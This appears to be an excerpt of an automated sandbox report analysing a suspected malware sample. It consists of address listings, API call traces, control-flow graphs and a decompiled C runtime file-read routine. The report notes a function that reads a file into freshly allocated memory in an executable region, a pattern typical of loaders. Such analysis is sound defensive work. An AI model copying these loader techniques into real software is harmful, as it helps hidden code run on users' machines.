                                                                                              0x0040c553
                                                                                              0x0040c572
                                                                                              0x0040c575
                                                                                              0x0040c579
                                                                                              0x0040c57a
                                                                                              0x0040c580
                                                                                              0x0040c585
                                                                                              0x0040c588
                                                                                              0x0040c58a
                                                                                              0x0040c58c
                                                                                              0x0040c591
                                                                                              0x0040c593
                                                                                              0x0040c595
                                                                                              0x0040c598
                                                                                              0x0040c59a
                                                                                              0x0040c5b4
                                                                                              0x0040c5d8
                                                                                              0x0040c5dc
                                                                                              0x0040c5e0
                                                                                              0x0040c5e2
                                                                                              0x0040c5e6
                                                                                              0x0040c5e8
                                                                                              0x0040c5f2
                                                                                              0x0040c5f5
                                                                                              0x0040c5fc
                                                                                              0x0040c5fc
                                                                                              0x0040c5fc
                                                                                              0x0040c5fc
                                                                                              0x0040c5e6
                                                                                              0x0040c601
                                                                                              0x0040c60d
                                                                                              0x0040c60f
                                                                                              0x0040c69a
                                                                                              0x0040c69a
                                                                                              0x00000000
                                                                                              0x0040c615
                                                                                              0x0040c615
                                                                                              0x0040c619
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c61e
                                                                                              0x0040c630
                                                                                              0x0040c638
                                                                                              0x0040c63b
                                                                                              0x0040c63c
                                                                                              0x0040c63f
                                                                                              0x0040c646
                                                                                              0x0040c64b
                                                                                              0x0040c64e
                                                                                              0x0040c682
                                                                                              0x0040c68c
                                                                                              0x0040c68c
                                                                                              0x0040c696
                                                                                              0x00000000
                                                                                              0x0040c696
                                                                                              0x0040c657
                                                                                              0x0040c670
                                                                                              0x0040c677
                                                                                              0x0040c497
                                                                                              0x00000000
                                                                                              0x0040c497
                                                                                              0x0040c60f
                                                                                              0x0040c59c
                                                                                              0x00000000
                                                                                              0x0040c555
                                                                                              0x0040c55c
                                                                                              0x0040c55f
                                                                                              0x0040c561
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c563
                                                                                              0x0040c565
                                                                                              0x0040c565
                                                                                              0x00000000
                                                                                              0x0040c56b
                                                                                              0x0040c553
                                                                                              0x0040c4ae
                                                                                              0x0040c4b1
                                                                                              0x0040c4cc
                                                                                              0x0040c4d1
                                                                                              0x0040c4d7
                                                                                              0x0040c4d9
                                                                                              0x0040c4e4
                                                                                              0x0040c4e4
                                                                                              0x00000000
                                                                                              0x0040c4d9
                                                                                              0x0040c432
                                                                                              0x0040c439
                                                                                              0x0040c43b
                                                                                              0x0040c472
                                                                                              0x0040c472
                                                                                              0x0040c47c
                                                                                              0x0040c47f
                                                                                              0x0040c486
                                                                                              0x0040c486
                                                                                              0x0040c486
                                                                                              0x0040c492
                                                                                              0x00000000
                                                                                              0x0040c492
                                                                                              0x0040c43d
                                                                                              0x0040c441
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c443
                                                                                              0x0040c452
                                                                                              0x0040c457
                                                                                              0x0040c45a
                                                                                              0x0040c45b
                                                                                              0x0040c45e
                                                                                              0x0040c45e
                                                                                              0x0040c465
                                                                                              0x0040c467
                                                                                              0x0040c46a
                                                                                              0x0040c46d
                                                                                              0x0040c470
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c3d0
                                                                                              0x0040c3d5
                                                                                              0x0040c3d8
                                                                                              0x0040c3df
                                                                                              0x00000000
                                                                                              0x0040c3df
                                                                                              0x0040c3a9
                                                                                              0x0040c3ae
                                                                                              0x0040c3b4
                                                                                              0x0040c3b6
                                                                                              0x00000000
                                                                                              0x0040c3bb

                                                                                              APIs
                                                                                                • Part of subcall function 0040C030: CreateFileW.KERNELBASE(?,00000000,?,0040C420,?,?,00000000,?,0040C420,?,0000000C), ref: 0040C04D
                                                                                              • GetLastError.KERNEL32 ref: 0040C48B
                                                                                              • __dosmaperr.LIBCMT ref: 0040C492
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 0040C49E
                                                                                              • GetLastError.KERNEL32 ref: 0040C4A8
                                                                                              • __dosmaperr.LIBCMT ref: 0040C4B1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C4D1
                                                                                              • CloseHandle.KERNEL32(00407F0C), ref: 0040C61E
                                                                                              • GetLastError.KERNEL32 ref: 0040C650
                                                                                              • __dosmaperr.LIBCMT ref: 0040C657
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 216730e1ba3c6cdd5ccffb57061b88016ec9ad3c0ce0d6b023d8d0ea30ecba15
                                                                                              • Instruction ID: df2dc668534c79af01fb2244877fb3bda6c640e03432be08ced5e9c2c86fbc85
                                                                                              • Opcode Fuzzy Hash: 216730e1ba3c6cdd5ccffb57061b88016ec9ad3c0ce0d6b023d8d0ea30ecba15
                                                                                              • Instruction Fuzzy Hash: EAA1E232A14154DFCF199F68DC91BAE3BA1EB06314F14426EF801EB3D1DB399912CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A40D81 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 69 a40d81-a40e51 call a4005f call a40073 * 7 call a40109 CreateFileW 88 a40e57-a40e62 69->88 89 a40f30 69->89 88->89 94 a40e68-a40e78 VirtualAlloc 88->94 90 a40f32-a40f37 89->90 91 a40f3d-a40f42 90->91 92 a40f39 90->92 98 a40f5e-a40f61 91->98 92->91 94->89 95 a40e7e-a40e8d ReadFile 94->95 95->89 97 a40e93-a40eb2 VirtualAlloc 95->97 99 a40eb4-a40ec7 call a400da 97->99 100 a40f2c-a40f2e 97->100 101 a40f44-a40f48 98->101 102 a40f63-a40f68 98->102 111 a40f02-a40f12 call a40073 99->111 112 a40ec9-a40ed4 99->112 100->90 104 a40f54-a40f56 101->104 105 a40f4a-a40f52 101->105 106 a40f75-a40f7d 102->106 107 a40f6a-a40f72 VirtualFree 102->107 109 a40f5d 104->109 110 a40f58-a40f5b 104->110 105->98 107->106 109->98 110->98 111->90 118 a40f14-a40f19 111->118 113 a40ed7-a40f00 call a400da 112->113 113->111 119 a40f1f-a40f2a VirtualFree 118->119 120 a40f1b-a40f1c FindCloseChangeNotification 118->120 119->98 120->119
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00A41617,7FAB7E30), ref: 00A40E47
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00A41617,7FAB7E30,00A412D5,00000000,00000040), ref: 00A40E71
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00A41617,7FAB7E30,00A412D5,00000000), ref: 00A40E88
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00A41617,7FAB7E30,00A412D5,00000000,00000040), ref: 00A40EAA
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00A41617,7FAB7E30,00A412D5,00000000,00000040,?,00000000,0000000E), ref: 00A40F1C
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00A41617,7FAB7E30,00A412D5,00000000,00000040,?), ref: 00A40F27
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00A41617,7FAB7E30,00A412D5,00000000,00000040,?), ref: 00A40F72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                              • String ID:
                                                                                              • API String ID: 656311269-0
                                                                                              • Opcode ID: 35d11c16c1321e512051bfd65c9d4344f29d3fcc8d8528c3e8764089330f168d
                                                                                              • Instruction ID: caf8249dc52b84e9e20650545189a33def900b3398887f413f065223102d9b9a
                                                                                              • Opcode Fuzzy Hash: 35d11c16c1321e512051bfd65c9d4344f29d3fcc8d8528c3e8764089330f168d
                                                                                              • Instruction Fuzzy Hash: 3551AE75E00218BBDB209FB4DC85FAEBBB8AF88710F104525FA54F7281E7749904DB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407510 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 121 407510-407520 122 407522-407535 call 407b17 call 407b2a 121->122 123 40753a-40753c 121->123 139 407894 122->139 125 407542-407548 123->125 126 40787c-407889 call 407b17 call 407b2a 123->126 125->126 129 40754e-407577 125->129 144 40788f call 406527 126->144 129->126 132 40757d-407586 129->132 135 4075a0-4075a2 132->135 136 407588-40759b call 407b17 call 407b2a 132->136 137 407878-40787a 135->137 138 4075a8-4075ac 135->138 136->144 143 407897-40789a 137->143 138->137 142 4075b2-4075b6 138->142 139->143 142->136 147 4075b8-4075cf 142->147 144->139 150 4075d1-4075d4 147->150 151 407604-40760a 147->151 154 4075d6-4075dc 150->154 155 4075fa-407602 150->155 152 40760c-407613 151->152 153 4075de-4075f5 call 407b17 call 407b2a call 406527 151->153 157 407615 152->157 158 407617-407635 call 40a663 call 408654 * 2 152->158 187 4077af 153->187 154->153 154->155 156 407677-407696 155->156 160 407752-40775b call 40bb22 156->160 161 40769c-4076a8 156->161 157->158 191 407652-407675 call 406894 158->191 192 407637-40764d call 407b2a call 407b17 158->192 175 4077cc 160->175 176 40775d-40776f 160->176 161->160 164 4076ae-4076b0 161->164 164->160 168 4076b6-4076d7 164->168 168->160 172 4076d9-4076ef 168->172 172->160 178 4076f1-4076f3 172->178 180 4077d0-4077e6 ReadFile 175->180 176->175 177 407771-407780 GetConsoleMode 176->177 177->175 182 407782-407786 177->182 178->160 183 4076f5-407718 178->183 185 407844-40784f GetLastError 180->185 186 4077e8-4077ee 180->186 182->180 188 407788-4077a0 ReadConsoleW 182->188 183->160 190 40771a-407730 183->190 193 407851-407863 call 407b2a call 407b17 185->193 194 407868-40786b 185->194 186->185 195 4077f0 186->195 189 4077b2-4077bc call 408654 187->189 198 4077c1-4077ca 188->198 199 4077a2 GetLastError 188->199 189->143 190->160 203 407732-407734 190->203 191->156 192->187 193->187 200 407871-407873 194->200 201 4077a8-4077ae call 407ad0 194->201 197 4077f3-407805 195->197 197->189 208 407807-40780b 197->208 198->197 199->201 200->189 201->187 203->160 211 407736-40774d 203->211 214 407824-407831 208->214 215 40780d-40781d call 407222 208->215 211->160 220 407833 call 407379 214->220 221 40783d-407842 call 407068 214->221 226 407820-407822 215->226 227 407838-40783b 220->227 221->227 226->189 227->226
                                                                                              C-Code - Quality: 78%
                                                                                              			E00407510(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				long _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t127;
				signed int _t129;
				signed int _t130;
				intOrPtr _t133;
				signed int _t136;
				signed int _t138;
				signed char _t140;
				intOrPtr _t148;
				long _t150;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				long _t155;
				intOrPtr _t160;
				signed int _t161;
				intOrPtr _t163;
				signed int _t165;
				signed int _t167;
				char _t169;
				char _t174;
				char _t179;
				signed char _t186;
				long _t192;
				signed int _t196;
				signed char _t197;
				signed int _t198;
				long _t200;
				intOrPtr _t202;
				void* _t203;
				unsigned int _t206;
				signed int _t208;
				char* _t210;
				char* _t211;
				char* _t212;
				signed int _t215;
				long _t216;
				signed int _t217;
				signed int _t218;
				signed int _t225;
				signed int _t226;
				void* _t230;
				void* _t232;
				void* _t233;
				void* _t234;

				_t215 = _a4;
				_t233 = _t232 - 0x24;
				if(_t215 != 0xfffffffe) {
					__eflags = _t215;
					if(_t215 < 0) {
						L58:
						_t127 = E00407B17();
						 *_t127 =  *_t127 & 0x00000000;
						__eflags =  *_t127;
						 *((intOrPtr*)(E00407B2A())) = 9;
						L59:
						_t129 = E00406527();
						goto L60;
					}
					__eflags = _t215 -  *0x4190c0; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_t196 = _t215 >> 6;
					_t225 = (_t215 & 0x0000003f) * 0x38;
					_v12 = _t196;
					_v32 = 1;
					_t133 =  *((intOrPtr*)(0x418ec0 + _t196 * 4));
					_v20 = _t225;
					_t197 =  *((intOrPtr*)(_t225 + _t133 + 0x28));
					_v5 = _t197;
					__eflags = 1 & _t197;
					if((1 & _t197) == 0) {
						goto L58;
					}
					_t198 = _a12;
					__eflags = _t198 - 0x7fffffff;
					if(_t198 <= 0x7fffffff) {
						__eflags = _t198;
						if(_t198 == 0) {
							L57:
							_t130 = 0;
							goto L61;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t136 =  *((intOrPtr*)(_t225 + _t133 + 0x29));
						_v5 = _t136;
						_v24 =  *((intOrPtr*)(_t225 + _t133 + 0x18));
						_t230 = 0;
						_t138 = _t136 - 1;
						__eflags = _t138;
						if(_t138 == 0) {
							_t140 =  !_t198;
							__eflags = 1 & _t140;
							if((1 & _t140) == 0) {
								L13:
								 *(E00407B17()) =  *_t141 & _t230;
								 *((intOrPtr*)(E00407B2A())) = 0x16;
								E00406527();
								goto L38;
							} else {
								_t200 = _t198 >> 1;
								_t192 = 4;
								__eflags = _t200 - 1;
								if(_t200 >= 1) {
									_t192 = _t200;
								}
								_t230 = E0040A663(_t192);
								E00408654(0);
								E00408654(0);
								_t234 = _t233 + 0xc;
								_v16 = _t230;
								__eflags = _t230;
								if(_t230 != 0) {
									_t148 = E00406894(_t215, _a4, 0, 0, 1);
									_t233 = _t234 + 0x10;
									_t202 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
									 *((intOrPtr*)(_t225 + _t202 + 0x20)) = _t148;
									 *(_t225 + _t202 + 0x24) = _t215;
									_t203 = _t230;
									L21:
									_t225 = 0;
									_v36 = _t203;
									_t150 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
									_v28 = _t150;
									_t216 = _t150;
									_t151 = _v20;
									__eflags =  *(_t151 + _t216 + 0x28) & 0x00000048;
									_t217 = _a4;
									if(( *(_t151 + _t216 + 0x28) & 0x00000048) != 0) {
										_t169 =  *((intOrPtr*)(_t151 + _v28 + 0x2a));
										_t210 = _v16;
										__eflags = _t169 - 0xa;
										if(_t169 != 0xa) {
											__eflags = _t192;
											if(_t192 != 0) {
												_t225 = 1;
												 *_t210 = _t169;
												_t211 = _t210 + 1;
												_t192 = _t192 - 1;
												__eflags = _v5;
												_v16 = _t211;
												 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t217 = _a4;
												if(_v5 != 0) {
													_t174 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2b));
													_t217 = _a4;
													__eflags = _t174 - 0xa;
													if(_t174 != 0xa) {
														__eflags = _t192;
														if(_t192 != 0) {
															 *_t211 = _t174;
															_t212 = _t211 + 1;
															_t192 = _t192 - 1;
															__eflags = _v5 - 1;
															_v16 = _t212;
															_t225 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t217 = _a4;
															if(_v5 == 1) {
																_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2c));
																_t217 = _a4;
																__eflags = _t179 - 0xa;
																if(_t179 != 0xa) {
																	__eflags = _t192;
																	if(_t192 != 0) {
																		 *_t212 = _t179;
																		_t192 = _t192 - 1;
																		__eflags = _t192;
																		_v16 = _t212 + 1;
																		_t225 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t152 = E0040BB22(_t217);
									__eflags = _t152;
									if(_t152 == 0) {
										L41:
										_v32 = 0;
										L42:
										_t193 = _v16;
										_t154 = ReadFile(_v24, _v16, _t192,  &_v28, 0); // executed
										__eflags = _t154;
										if(_t154 == 0) {
											L53:
											_t155 = GetLastError();
											_t225 = 5;
											__eflags = _t155 - _t225;
											if(_t155 != _t225) {
												__eflags = _t155 - 0x6d;
												if(_t155 != 0x6d) {
													L37:
													E00407AD0(_t155);
													goto L38;
												}
												_t226 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00407B2A())) = 9;
											 *(E00407B17()) = _t225;
											goto L38;
										}
										_t206 = _a12;
										__eflags = _v28 - _t206;
										if(_v28 > _t206) {
											goto L53;
										}
										_t226 = _t225 + _v28;
										__eflags = _t226;
										L45:
										_t218 = _v20;
										_t160 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
										__eflags =  *((char*)(_t218 + _t160 + 0x28));
										if( *((char*)(_t218 + _t160 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t226 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t161 = E00407068();
												} else {
													_t161 = E00407379(_t206);
												}
											} else {
												_t207 = _t206 >> 1;
												__eflags = _t206 >> 1;
												_t161 = E00407222(_t206 >> 1, _t206 >> 1, _a4, _t193, _t226, _a8, _t207);
											}
											_t226 = _t161;
										}
										goto L39;
									}
									_t208 = _v20;
									_t163 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
									__eflags =  *((char*)(_t208 + _t163 + 0x28));
									if( *((char*)(_t208 + _t163 + 0x28)) >= 0) {
										goto L41;
									}
									_t165 = GetConsoleMode(_v24,  &_v40);
									__eflags = _t165;
									if(_t165 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t193 = _v16;
									_t167 = ReadConsoleW(_v24, _v16, _t192 >> 1,  &_v28, 0);
									__eflags = _t167;
									if(_t167 != 0) {
										_t206 = _a12;
										_t226 = _t225 + _v28 * 2;
										goto L45;
									}
									_t155 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00407B2A())) = 0xc;
									 *(E00407B17()) = 8;
									L38:
									_t226 = _t225 | 0xffffffff;
									__eflags = _t226;
									L39:
									E00408654(_t230);
									_t130 = _t226;
									goto L61;
								}
							}
						}
						__eflags = _t138 != 1;
						if(_t138 != 1) {
							L14:
							_t192 = _t198;
							_t203 = _a8;
							_v16 = _t203;
							goto L21;
						}
						_t186 =  !_t198;
						__eflags = 1 & _t186;
						if((1 & _t186) != 0) {
							goto L14;
						}
						goto L13;
					}
					L6:
					 *(E00407B17()) =  *_t134 & 0x00000000;
					 *((intOrPtr*)(E00407B2A())) = 0x16;
					goto L59;
				} else {
					 *(E00407B17()) =  *_t187 & 0x00000000;
					_t129 = E00407B2A();
					 *_t129 = 9;
					L60:
					_t130 = _t129 | 0xffffffff;
					L61:
					return _t130;
				}
			}
























































                                                                                              0x00407515
                                                                                              0x00407518
                                                                                              0x00407520
                                                                                              0x0040753a
                                                                                              0x0040753c
                                                                                              0x0040787c
                                                                                              0x0040787c
                                                                                              0x00407881
                                                                                              0x00407881
                                                                                              0x00407889
                                                                                              0x0040788f
                                                                                              0x0040788f
                                                                                              0x00000000
                                                                                              0x0040788f
                                                                                              0x00407542
                                                                                              0x00407548
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407552
                                                                                              0x00407558
                                                                                              0x0040755d
                                                                                              0x00407561
                                                                                              0x00407564
                                                                                              0x0040756b
                                                                                              0x0040756e
                                                                                              0x00407572
                                                                                              0x00407575
                                                                                              0x00407577
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040757d
                                                                                              0x00407580
                                                                                              0x00407586
                                                                                              0x004075a0
                                                                                              0x004075a2
                                                                                              0x00407878
                                                                                              0x00407878
                                                                                              0x00000000
                                                                                              0x00407878
                                                                                              0x004075a8
                                                                                              0x004075ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004075b2
                                                                                              0x004075b6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x004075c1
                                                                                              0x004075c4
                                                                                              0x004075c7
                                                                                              0x004075cc
                                                                                              0x004075cc
                                                                                              0x004075cf
                                                                                              0x00407606
                                                                                              0x00407608
                                                                                              0x0040760a
                                                                                              0x004075de
                                                                                              0x004075e3
                                                                                              0x004075ea
                                                                                              0x004075f0
                                                                                              0x00000000
                                                                                              0x0040760c
                                                                                              0x0040760e
                                                                                              0x00407610
                                                                                              0x00407611
                                                                                              0x00407613
                                                                                              0x00407615
                                                                                              0x00407615
                                                                                              0x0040761f
                                                                                              0x00407621
                                                                                              0x00407628
                                                                                              0x0040762d
                                                                                              0x00407630
                                                                                              0x00407633
                                                                                              0x00407635
                                                                                              0x0040765b
                                                                                              0x00407663
                                                                                              0x00407666
                                                                                              0x0040766d
                                                                                              0x00407671
                                                                                              0x00407675
                                                                                              0x00407677
                                                                                              0x0040767a
                                                                                              0x0040767c
                                                                                              0x0040767f
                                                                                              0x00407686
                                                                                              0x00407689
                                                                                              0x0040768b
                                                                                              0x0040768e
                                                                                              0x00407693
                                                                                              0x00407696
                                                                                              0x0040769f
                                                                                              0x004076a3
                                                                                              0x004076a6
                                                                                              0x004076a8
                                                                                              0x004076ae
                                                                                              0x004076b0
                                                                                              0x004076b9
                                                                                              0x004076ba
                                                                                              0x004076bc
                                                                                              0x004076c0
                                                                                              0x004076c1
                                                                                              0x004076c5
                                                                                              0x004076cf
                                                                                              0x004076d4
                                                                                              0x004076d7
                                                                                              0x004076e6
                                                                                              0x004076ea
                                                                                              0x004076ed
                                                                                              0x004076ef
                                                                                              0x004076f1
                                                                                              0x004076f3
                                                                                              0x004076f8
                                                                                              0x004076fa
                                                                                              0x004076fe
                                                                                              0x004076ff
                                                                                              0x00407705
                                                                                              0x0040770f
                                                                                              0x00407710
                                                                                              0x00407715
                                                                                              0x00407718
                                                                                              0x00407727
                                                                                              0x0040772b
                                                                                              0x0040772e
                                                                                              0x00407730
                                                                                              0x00407732
                                                                                              0x00407734
                                                                                              0x00407736
                                                                                              0x0040773c
                                                                                              0x0040773c
                                                                                              0x0040773d
                                                                                              0x0040774c
                                                                                              0x0040774d
                                                                                              0x0040774d
                                                                                              0x00407734
                                                                                              0x00407730
                                                                                              0x00407718
                                                                                              0x004076f3
                                                                                              0x004076ef
                                                                                              0x004076d7
                                                                                              0x004076b0
                                                                                              0x004076a8
                                                                                              0x00407753
                                                                                              0x00407759
                                                                                              0x0040775b
                                                                                              0x004077cc
                                                                                              0x004077cc
                                                                                              0x004077d0
                                                                                              0x004077d7
                                                                                              0x004077de
                                                                                              0x004077e4
                                                                                              0x004077e6
                                                                                              0x00407844
                                                                                              0x00407844
                                                                                              0x0040784c
                                                                                              0x0040784d
                                                                                              0x0040784f
                                                                                              0x00407868
                                                                                              0x0040786b
                                                                                              0x004077a8
                                                                                              0x004077a9
                                                                                              0x00000000
                                                                                              0x004077ae
                                                                                              0x00407871
                                                                                              0x00000000
                                                                                              0x00407871
                                                                                              0x00407856
                                                                                              0x00407861
                                                                                              0x00000000
                                                                                              0x00407861
                                                                                              0x004077e8
                                                                                              0x004077eb
                                                                                              0x004077ee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004077f0
                                                                                              0x004077f0
                                                                                              0x004077f3
                                                                                              0x004077f6
                                                                                              0x004077f9
                                                                                              0x00407800
                                                                                              0x00407805
                                                                                              0x00407807
                                                                                              0x0040780b
                                                                                              0x00407826
                                                                                              0x0040782a
                                                                                              0x0040782b
                                                                                              0x0040782e
                                                                                              0x00407831
                                                                                              0x0040783d
                                                                                              0x00407833
                                                                                              0x00407833
                                                                                              0x00407833
                                                                                              0x0040780d
                                                                                              0x0040780d
                                                                                              0x0040780d
                                                                                              0x00407818
                                                                                              0x0040781d
                                                                                              0x00407820
                                                                                              0x00407820
                                                                                              0x00000000
                                                                                              0x00407805
                                                                                              0x00407760
                                                                                              0x00407763
                                                                                              0x0040776a
                                                                                              0x0040776f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407778
                                                                                              0x0040777e
                                                                                              0x00407780
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407782
                                                                                              0x00407786
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407791
                                                                                              0x00407798
                                                                                              0x0040779e
                                                                                              0x004077a0
                                                                                              0x004077c4
                                                                                              0x004077c7
                                                                                              0x00000000
                                                                                              0x004077c7
                                                                                              0x004077a2
                                                                                              0x00000000
                                                                                              0x00407637
                                                                                              0x0040763c
                                                                                              0x00407647
                                                                                              0x004077af
                                                                                              0x004077af
                                                                                              0x004077af
                                                                                              0x004077b2
                                                                                              0x004077b3
                                                                                              0x004077b9
                                                                                              0x00000000
                                                                                              0x004077bb
                                                                                              0x00407635
                                                                                              0x0040760a
                                                                                              0x004075d1
                                                                                              0x004075d4
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x004075fc
                                                                                              0x004075ff
                                                                                              0x00000000
                                                                                              0x004075ff
                                                                                              0x004075d8
                                                                                              0x004075da
                                                                                              0x004075dc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004075dc
                                                                                              0x00407588
                                                                                              0x0040758d
                                                                                              0x00407595
                                                                                              0x00000000
                                                                                              0x00407522
                                                                                              0x00407527
                                                                                              0x0040752a
                                                                                              0x0040752f
                                                                                              0x00407894
                                                                                              0x00407894
                                                                                              0x00407897
                                                                                              0x0040789a
                                                                                              0x0040789a

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: acc0b0db410d4721197250e6b482ce9f886eea2b5f2a0b5e78120b7be6bb346a
                                                                                              • Instruction ID: 3be97f551646e6e480c5624a4dbc5da17834e54e1b6d85ad351a011fd4d0e8fd
                                                                                              • Opcode Fuzzy Hash: acc0b0db410d4721197250e6b482ce9f886eea2b5f2a0b5e78120b7be6bb346a
                                                                                              • Instruction Fuzzy Hash: 97B1D071E08245ABDB01DF59C880BAE7BB1BF49344F14817AE505B73D2C778B942CB6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
